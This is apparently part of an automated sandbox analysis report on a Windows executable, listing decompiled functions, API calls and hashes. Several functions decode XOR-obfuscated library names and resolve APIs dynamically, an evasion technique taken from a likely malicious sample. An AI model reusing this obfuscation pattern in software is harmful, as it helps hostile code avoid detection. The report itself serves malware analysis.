                                                                    0x0041db16
                                                                    0x0041db1a
                                                                    0x0041db1a
                                                                    0x0041db16
                                                                    0x0041db25
                                                                    0x0041da76
                                                                    0x0041da78
                                                                    0x0041da7c
                                                                    0x0041da82
                                                                    0x0041da86
                                                                    0x0041da8a
                                                                    0x0041da8f
                                                                    0x0041da94
                                                                    0x0041da99
                                                                    0x0041da9e
                                                                    0x0041daa3
                                                                    0x0041daa8
                                                                    0x0041daad
                                                                    0x0041dab0
                                                                    0x0041dab0
                                                                    0x0041dab5
                                                                    0x0041dab6
                                                                    0x0041dac0
                                                                    0x0041dac8
                                                                    0x0041dacd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041dacf
                                                                    0x0041dad2
                                                                    0x0041dad4
                                                                    0x0041dae0
                                                                    0x0041dae0
                                                                    0x0041dae1
                                                                    0x0041dae1
                                                                    0x0041dae7
                                                                    0x0041daef
                                                                    0x0041daf3
                                                                    0x0041daf8
                                                                    0x0041daf8
                                                                    0x00000000
                                                                    0x0041daef

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(0000005D), ref: 0041DAC0
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041DB03
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: .$9$]$]$n$s
                                                                    • API String ID: 2574300362-1295284220
                                                                    • Opcode ID: f9ceeb0a3f171ee359b9fda0626b57e1d140181f4c68cf74b47754b46062da32
                                                                    • Instruction ID: f63ae0a42ef01c4788117a8a6e3e38cce6ab980ebf4f5bce606425f6337d4827
                                                                    • Opcode Fuzzy Hash: f9ceeb0a3f171ee359b9fda0626b57e1d140181f4c68cf74b47754b46062da32
                                                                    • Instruction Fuzzy Hash: 29213775A0C3908ED711DB28D80439FBBE56F62384F04885EE8D987342C378D949C7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041E6C0(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				void* _v16;
                                                                    				struct HINSTANCE__* _t21;
                                                                    				intOrPtr _t24;
                                                                    				void* _t27;
                                                                    				intOrPtr _t36;
                                                                    				_Unknown_base(*)()* _t39;
                                                                    				void* _t41;
                                                                    
                                                                    				_t41 =  &_v16;
                                                                    				_t21 =  *0x447d80; // 0x0
                                                                    				if(_t21 != 0) {
                                                                    					L6:
                                                                    					_t39 = GetProcAddress(_t21, _a4);
                                                                    					if(_t39 == 0) {
                                                                    						_t24 =  *0x447d7c; // 0x1
                                                                    						if(_t24 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t39;
                                                                    				} else {
                                                                    					_v4 = 0x4f;
                                                                    					_v3 = 0x4f;
                                                                    					_v12 = 0x56;
                                                                    					_v11 = 0x50;
                                                                    					_v10 = 0x46;
                                                                    					_v9 = 0x51;
                                                                    					_v8 = 0x10;
                                                                    					_v7 = 0x11;
                                                                    					_v6 = 0xd;
                                                                    					_v5 = 0x47;
                                                                    					_v2 = 0x23;
                                                                    					_t27 = 0;
                                                                    					goto L2;
                                                                    					L2:
                                                                    					 *(_t41 + _t27 + 4) =  *(_t41 + _t27 + 4) ^ 0x00000023;
                                                                    					_t27 = _t27 + 1;
                                                                    					if(_t27 < 0xb) {
                                                                    						goto L2;
                                                                    					} else {
                                                                    						_t21 = LoadLibraryA( &_v12);
                                                                    						 *0x447d80 = _t21;
                                                                    						if(_t21 == 0) {
                                                                    							_t36 =  *0x447d7c; // 0x1
                                                                    							if(_t36 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t21 =  *0x447d80; // 0x0
                                                                    							}
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}





















                                                                    0x0041e6cc
                                                                    0x0041e6dc
                                                                    0x0041e6e3
                                                                    0x0041e755
                                                                    0x0041e762
                                                                    0x0041e766
                                                                    0x0041e768
                                                                    0x0041e76f
                                                                    0x0041e773
                                                                    0x0041e773
                                                                    0x0041e76f
                                                                    0x0041e77e
                                                                    0x0041e6e5
                                                                    0x0041e6e7
                                                                    0x0041e6eb
                                                                    0x0041e6ef
                                                                    0x0041e6f4
                                                                    0x0041e6f9
                                                                    0x0041e6fe
                                                                    0x0041e703
                                                                    0x0041e708
                                                                    0x0041e70d
                                                                    0x0041e712
                                                                    0x0041e717
                                                                    0x0041e71c
                                                                    0x0041e71c
                                                                    0x0041e720
                                                                    0x0041e720
                                                                    0x0041e725
                                                                    0x0041e729
                                                                    0x00000000
                                                                    0x0041e72b
                                                                    0x0041e730
                                                                    0x0041e738
                                                                    0x0041e73d
                                                                    0x0041e73f
                                                                    0x0041e747
                                                                    0x0041e74b
                                                                    0x0041e750
                                                                    0x0041e750
                                                                    0x0041e747
                                                                    0x00000000
                                                                    0x0041e73d
                                                                    0x0041e729

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000023), ref: 0041E730
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041E75C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: #$#$F$G$P$Q
                                                                    • API String ID: 2574300362-189938813
                                                                    • Opcode ID: 5e7becb68d88655aeacccd6c82e3a150e8ab45c56a3a61cf64c262db6ff26e82
                                                                    • Instruction ID: be822463ee9e1b72bf6663f729873995654200478fad9ce6b249bfcabaea4946
                                                                    • Opcode Fuzzy Hash: 5e7becb68d88655aeacccd6c82e3a150e8ab45c56a3a61cf64c262db6ff26e82
                                                                    • Instruction Fuzzy Hash: E4216F7860C3805AE3059B39D8587ABBFD55F51744F04885DE4A8CB382E779C844876B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D870(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				struct HINSTANCE__* _t14;
                                                                    				intOrPtr _t17;
                                                                    				void* _t21;
                                                                    				intOrPtr _t25;
                                                                    				_Unknown_base(*)()* _t27;
                                                                    				CHAR* _t29;
                                                                    
                                                                    				_t14 =  *0x447fa4; // 0x0
                                                                    				if(_t14 != 0) {
                                                                    					L6:
                                                                    					_t27 = GetProcAddress(_t14, _a4);
                                                                    					if(_t27 == 0) {
                                                                    						_t17 =  *0x447d7c; // 0x1
                                                                    						if(_t17 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t27;
                                                                    				} else {
                                                                    					 *_t29 = 0x54;
                                                                    					_v5 = 0x54;
                                                                    					_v4 = 0x5c;
                                                                    					_v3 = 0x5c;
                                                                    					_v11 = 0x5e;
                                                                    					_v10 = 0x43;
                                                                    					_v9 = 0x51;
                                                                    					_v8 = 0x40;
                                                                    					_v7 = 0x59;
                                                                    					_v6 = 0x1e;
                                                                    					_v2 = 0x30;
                                                                    					_t21 = 0;
                                                                    					goto L2;
                                                                    					L2:
                                                                    					_t29[_t21] = _t29[_t21] ^ 0x00000030;
                                                                    					_t21 = _t21 + 1;
                                                                    					if(_t21 < 0xb) {
                                                                    						goto L2;
                                                                    					} else {
                                                                    						_t14 = LoadLibraryA(_t29);
                                                                    						 *0x447fa4 = _t14;
                                                                    						if(_t14 == 0) {
                                                                    							_t25 =  *0x447d7c; // 0x1
                                                                    							if(_t25 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t14 =  *0x447fa4; // 0x0
                                                                    							}
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}



















                                                                    0x0041d870
                                                                    0x0041d87a
                                                                    0x0041d8e7
                                                                    0x0041d8f4
                                                                    0x0041d8f8
                                                                    0x0041d8fa
                                                                    0x0041d901
                                                                    0x0041d905
                                                                    0x0041d905
                                                                    0x0041d901
                                                                    0x0041d910
                                                                    0x0041d87c
                                                                    0x0041d87e
                                                                    0x0041d881
                                                                    0x0041d887
                                                                    0x0041d88b
                                                                    0x0041d88f
                                                                    0x0041d894
                                                                    0x0041d899
                                                                    0x0041d89e
                                                                    0x0041d8a3
                                                                    0x0041d8a8
                                                                    0x0041d8ad
                                                                    0x0041d8b2
                                                                    0x0041d8b2
                                                                    0x0041d8b4
                                                                    0x0041d8b4
                                                                    0x0041d8b8
                                                                    0x0041d8bc
                                                                    0x00000000
                                                                    0x0041d8be
                                                                    0x0041d8c2
                                                                    0x0041d8ca
                                                                    0x0041d8cf
                                                                    0x0041d8d1
                                                                    0x0041d8d9
                                                                    0x0041d8dd
                                                                    0x0041d8e2
                                                                    0x0041d8e2
                                                                    0x0041d8d9
                                                                    0x00000000
                                                                    0x0041d8cf
                                                                    0x0041d8bc

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000001), ref: 0041D8C2
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0041D8EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: 0$@$C$Q$Y$^
                                                                    • API String ID: 2574300362-2069776461
                                                                    • Opcode ID: b127cf3ec14fa61f5905a082a36a0fdcb9f1affb5cc5e41b75bb8c5ca9011163
                                                                    • Instruction ID: 8cedf1f6df1d03ae25ba189cba42f6d3f91eb78cbf465b8f5c166923f929695d
                                                                    • Opcode Fuzzy Hash: b127cf3ec14fa61f5905a082a36a0fdcb9f1affb5cc5e41b75bb8c5ca9011163
                                                                    • Instruction Fuzzy Hash: 83113D74A0D3809ED712EB79A81479B7FE55F52744F04886EE4E88B342D278C948C7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041A600(CHAR* _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				char _v21;
                                                                    				signed int _t33;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t37;
                                                                    				struct HINSTANCE__* _t38;
                                                                    				intOrPtr _t41;
                                                                    				void* _t45;
                                                                    				signed char _t50;
                                                                    				signed int _t54;
                                                                    				signed char _t55;
                                                                    				void* _t61;
                                                                    				intOrPtr _t62;
                                                                    				signed char _t65;
                                                                    				signed int _t66;
                                                                    				void* _t73;
                                                                    				_Unknown_base(*)()* _t74;
                                                                    				signed char _t75;
                                                                    				void* _t76;
                                                                    
                                                                    				_t54 =  *0x447d78; // 0x0
                                                                    				_t33 = _t54;
                                                                    				_v20 = _t33 * 0x5a >> 0x20;
                                                                    				_v21 = _t33 * 0x5a;
                                                                    				_t35 = _v20;
                                                                    				_t65 = _t35 * 0x67 >> 0x20;
                                                                    				_t55 = _t54 - _t35 * 0x67;
                                                                    				_t37 = _v21;
                                                                    				_t73 = 0x27;
                                                                    				do {
                                                                    					_t65 = _t65 - _t37;
                                                                    					_t73 = _t73 - 1;
                                                                    				} while (_t73 != 0);
                                                                    				_t38 =  *0x447d88; // 0x74700000
                                                                    				_t50 = _t55 ^ _t65 | 0x0000004f;
                                                                    				if(_t38 != 0) {
                                                                    					L10:
                                                                    					_t74 = GetProcAddress(_t38, _a4);
                                                                    					if(_t74 == 0) {
                                                                    						_t41 =  *0x447d7c; // 0x1
                                                                    						if(_t41 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t74;
                                                                    				} else {
                                                                    					_v15 = 0x43;
                                                                    					_v12 = 0x43;
                                                                    					_v11 = 0x4a;
                                                                    					_v6 = 0x4a;
                                                                    					_v5 = 0x4a;
                                                                    					_v16 = 0x4d;
                                                                    					_v14 = 0x54;
                                                                    					_v13 = 0x48;
                                                                    					_v10 = 0x15;
                                                                    					_v9 = 0x14;
                                                                    					_v8 = 8;
                                                                    					_v7 = 0x42;
                                                                    					_v4 = 0x26;
                                                                    					_t45 = 0;
                                                                    					goto L4;
                                                                    					do {
                                                                    						L6:
                                                                    						_t66 = _t66 + (_t66 - _t75 | 0x0000005d);
                                                                    						_t61 = _t61 - 1;
                                                                    					} while (_t61 != 0);
                                                                    					if(_t38 == 0) {
                                                                    						_t62 =  *0x447d7c; // 0x1
                                                                    						if(_t62 != 0) {
                                                                    							E0041A720(1);
                                                                    							_t38 =  *0x447d88; // 0x74700000
                                                                    						}
                                                                    					}
                                                                    					goto L10;
                                                                    					L4:
                                                                    					 *(_t76 + _t45 + 0x10) =  *(_t76 + _t45 + 0x10) ^ 0x00000026;
                                                                    					_t45 = _t45 + 1;
                                                                    					if(_t45 < 0xd) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t38 = LoadLibraryA( &_v16);
                                                                    						_t66 = _v20;
                                                                    						_t75 = _t50;
                                                                    						 *0x447d88 = _t38;
                                                                    						_t61 = 0x1f;
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}



































                                                                    0x0041a603
                                                                    0x0041a610
                                                                    0x0041a61b
                                                                    0x0041a61f
                                                                    0x0041a623
                                                                    0x0041a629
                                                                    0x0041a62b
                                                                    0x0041a62d
                                                                    0x0041a631
                                                                    0x0041a636
                                                                    0x0041a636
                                                                    0x0041a638
                                                                    0x0041a638
                                                                    0x0041a63b
                                                                    0x0041a647
                                                                    0x0041a649
                                                                    0x0041a6f6
                                                                    0x0041a702
                                                                    0x0041a706
                                                                    0x0041a708
                                                                    0x0041a70f
                                                                    0x0041a713
                                                                    0x0041a713
                                                                    0x0041a70f
                                                                    0x0041a71f
                                                                    0x0041a64f
                                                                    0x0041a651
                                                                    0x0041a655
                                                                    0x0041a65b
                                                                    0x0041a65f
                                                                    0x0041a663
                                                                    0x0041a667
                                                                    0x0041a66c
                                                                    0x0041a671
                                                                    0x0041a676
                                                                    0x0041a67b
                                                                    0x0041a680
                                                                    0x0041a685
                                                                    0x0041a68a
                                                                    0x0041a68f
                                                                    0x0041a68f
                                                                    0x0041a6d0
                                                                    0x0041a6d0
                                                                    0x0041a6d6
                                                                    0x0041a6d8
                                                                    0x0041a6d8
                                                                    0x0041a6de
                                                                    0x0041a6e0
                                                                    0x0041a6e8
                                                                    0x0041a6ec
                                                                    0x0041a6f1
                                                                    0x0041a6f1
                                                                    0x0041a6e8
                                                                    0x00000000
                                                                    0x0041a691
                                                                    0x0041a691
                                                                    0x0041a696
                                                                    0x0041a69a
                                                                    0x00000000
                                                                    0x0041a69c
                                                                    0x0041a6a2
                                                                    0x0041a6a8
                                                                    0x0041a6ac
                                                                    0x0041a6c0
                                                                    0x0041a6c5
                                                                    0x00000000
                                                                    0x0041a6c5
                                                                    0x0041a69a

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,00000000), ref: 0041A6A2
                                                                    • GetProcAddress.KERNEL32(74700000,?), ref: 0041A6FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: &$&$B$H$T
                                                                    • API String ID: 2574300362-3028964318
                                                                    • Opcode ID: 484a06480022a4c012af639c51322cb882ed4a2c1c66c252459cc2ff750290e3
                                                                    • Instruction ID: 867886ee0e591554facc4739b1117f480313de392c298fcd43fe06b41dcd9fa2
                                                                    • Opcode Fuzzy Hash: 484a06480022a4c012af639c51322cb882ed4a2c1c66c252459cc2ff750290e3
                                                                    • Instruction Fuzzy Hash: F231BE2960D3818ED306CF3898547EBBBE45FA6344F08446EE5D487382C268CA4DC7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E004298E5(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                    				intOrPtr _t54;
                                                                    				int _t56;
                                                                    				char* _t57;
                                                                    				int _t68;
                                                                    				char* _t69;
                                                                    				int _t70;
                                                                    				int _t73;
                                                                    				void* _t77;
                                                                    				int _t81;
                                                                    				short* _t82;
                                                                    				void* _t97;
                                                                    				short* _t98;
                                                                    
                                                                    				_t94 = __esi;
                                                                    				_push(0x38);
                                                                    				_push(0x431328);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t54 =  *0x446f24; // 0x82246c35
                                                                    				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                    				 *(_t97 - 0x34) = 0;
                                                                    				 *(_t97 - 0x44) = 0;
                                                                    				_t81 =  *( *(_t97 + 0x14));
                                                                    				 *(_t97 - 0x40) = _t81;
                                                                    				 *(_t97 - 0x3c) = 0;
                                                                    				_t56 =  *(_t97 + 8);
                                                                    				if(_t56 ==  *(_t97 + 0xc)) {
                                                                    					_t82 =  *(_t97 - 0x48);
                                                                    					goto L31;
                                                                    				} else {
                                                                    					_t85 = _t97 - 0x30;
                                                                    					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                    						 *(_t97 - 0x3c) = 1;
                                                                    					}
                                                                    					if( *(_t97 - 0x3c) == 0) {
                                                                    						_t94 =  *(_t97 - 0x38);
                                                                    					} else {
                                                                    						if(_t81 == 0xffffffff) {
                                                                    							_t77 = E00422F20( *(_t97 + 0x10));
                                                                    							_pop(_t85);
                                                                    							_t94 = _t77 + 1;
                                                                    							__eflags = _t94;
                                                                    						} else {
                                                                    							_t94 = _t81;
                                                                    						}
                                                                    						 *(_t97 - 0x38) = _t94;
                                                                    					}
                                                                    					if( *(_t97 - 0x3c) != 0) {
                                                                    						L14:
                                                                    						 *(_t97 - 4) = 0;
                                                                    						E00422920(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                    						 *(_t97 - 0x18) = _t98;
                                                                    						_t82 = _t98;
                                                                    						 *(_t97 - 0x48) = _t82;
                                                                    						E004282F0(_t82, 0, _t94 + _t94);
                                                                    						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                    						_t111 = _t82;
                                                                    						if(_t82 != 0) {
                                                                    							L19:
                                                                    							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                    							__eflags = _t68;
                                                                    							if(_t68 == 0) {
                                                                    								L31:
                                                                    								__eflags =  *(_t97 - 0x44);
                                                                    								if(__eflags != 0) {
                                                                    									_push(_t82);
                                                                    									E0042275E(_t82, 0, _t94, __eflags);
                                                                    								}
                                                                    								_t57 =  *(_t97 - 0x34);
                                                                    								goto L34;
                                                                    							}
                                                                    							__eflags =  *(_t97 + 0x18);
                                                                    							if( *(_t97 + 0x18) == 0) {
                                                                    								__eflags =  *(_t97 - 0x3c);
                                                                    								if(__eflags != 0) {
                                                                    									L25:
                                                                    									_push(_t94);
                                                                    									_push(1);
                                                                    									_t69 = E00427472(_t82, 0, _t94, __eflags);
                                                                    									 *(_t97 - 0x34) = _t69;
                                                                    									__eflags = _t69;
                                                                    									if(_t69 != 0) {
                                                                    										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                    										__eflags = _t70;
                                                                    										if(__eflags != 0) {
                                                                    											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                    											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                    												 *( *(_t97 + 0x14)) = _t70;
                                                                    											}
                                                                    										} else {
                                                                    											_push( *(_t97 - 0x34));
                                                                    											E0042275E(_t82, 0, _t94, __eflags);
                                                                    											 *(_t97 - 0x34) = 0;
                                                                    										}
                                                                    									}
                                                                    									goto L31;
                                                                    								}
                                                                    								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                    								__eflags = _t94;
                                                                    								if(__eflags == 0) {
                                                                    									goto L31;
                                                                    								}
                                                                    								goto L25;
                                                                    							}
                                                                    							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                    							__eflags = _t73;
                                                                    							if(_t73 != 0) {
                                                                    								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                    							}
                                                                    							goto L31;
                                                                    						} else {
                                                                    							_push(_t94);
                                                                    							_push(2);
                                                                    							_t82 = E00427472(_t82, 0, _t94, _t111);
                                                                    							if(_t82 != 0) {
                                                                    								 *(_t97 - 0x44) = 1;
                                                                    								goto L19;
                                                                    							}
                                                                    							goto L17;
                                                                    						}
                                                                    					} else {
                                                                    						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                    						 *(_t97 - 0x38) = _t94;
                                                                    						if(_t94 == 0) {
                                                                    							L17:
                                                                    							_t57 = 0;
                                                                    							L34:
                                                                    							return E00424267(E00428381(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    			}















                                                                    0x004298e5
                                                                    0x004298e5
                                                                    0x004298e7
                                                                    0x004298ec
                                                                    0x004298f1
                                                                    0x004298f6
                                                                    0x004298fb
                                                                    0x004298fe
                                                                    0x00429904
                                                                    0x00429906
                                                                    0x00429909
                                                                    0x0042990c
                                                                    0x00429912
                                                                    0x00429a8b
                                                                    0x00000000
                                                                    0x00429918
                                                                    0x00429918
                                                                    0x00429927
                                                                    0x00429942
                                                                    0x00429942
                                                                    0x0042994c
                                                                    0x00429968
                                                                    0x0042994e
                                                                    0x00429951
                                                                    0x0042995a
                                                                    0x0042995f
                                                                    0x00429962
                                                                    0x00429962
                                                                    0x00429953
                                                                    0x00429953
                                                                    0x00429953
                                                                    0x00429963
                                                                    0x00429963
                                                                    0x0042996e
                                                                    0x0042998a
                                                                    0x0042998a
                                                                    0x00429996
                                                                    0x0042999b
                                                                    0x0042999e
                                                                    0x004299a0
                                                                    0x004299a9
                                                                    0x004299b1
                                                                    0x004299ce
                                                                    0x004299d0
                                                                    0x004299f0
                                                                    0x004299fd
                                                                    0x00429a03
                                                                    0x00429a05
                                                                    0x00429a8e
                                                                    0x00429a8e
                                                                    0x00429a91
                                                                    0x00429a93
                                                                    0x00429a94
                                                                    0x00429a99
                                                                    0x00429a9a
                                                                    0x00000000
                                                                    0x00429a9a
                                                                    0x00429a0b
                                                                    0x00429a0e
                                                                    0x00429a30
                                                                    0x00429a33
                                                                    0x00429a4b
                                                                    0x00429a4b
                                                                    0x00429a4c
                                                                    0x00429a4e
                                                                    0x00429a55
                                                                    0x00429a58
                                                                    0x00429a5a
                                                                    0x00429a66
                                                                    0x00429a6c
                                                                    0x00429a6e
                                                                    0x00429a7e
                                                                    0x00429a82
                                                                    0x00429a87
                                                                    0x00429a87
                                                                    0x00429a70
                                                                    0x00429a70
                                                                    0x00429a73
                                                                    0x00429a79
                                                                    0x00429a79
                                                                    0x00429a6e
                                                                    0x00000000
                                                                    0x00429a5a
                                                                    0x00429a45
                                                                    0x00429a47
                                                                    0x00429a49
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429a49
                                                                    0x00429a1e
                                                                    0x00429a24
                                                                    0x00429a26
                                                                    0x00429a2b
                                                                    0x00429a2b
                                                                    0x00000000
                                                                    0x004299d2
                                                                    0x004299d2
                                                                    0x004299d3
                                                                    0x004299dc
                                                                    0x004299e0
                                                                    0x004299e9
                                                                    0x00000000
                                                                    0x004299e9
                                                                    0x00000000
                                                                    0x004299e0
                                                                    0x00429970
                                                                    0x00429981
                                                                    0x00429983
                                                                    0x00429988
                                                                    0x004299e2
                                                                    0x004299e2
                                                                    0x00429a9d
                                                                    0x00429aad
                                                                    0x00429aad
                                                                    0x00000000
                                                                    0x00429988
                                                                    0x0042996e

                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,?,00431328,00000038,00427E6E,?,00000000,00000000,0042788D,00000000,00000000,00430BB8,0000001C,0042762B,00000001,00000020), ref: 00429923
                                                                    • GetCPInfo.KERNEL32(00000000,00000001), ref: 00429936
                                                                    • _strlen.LIBCMT ref: 0042995A
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,0042788D,?,00000000,00000000), ref: 0042997B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
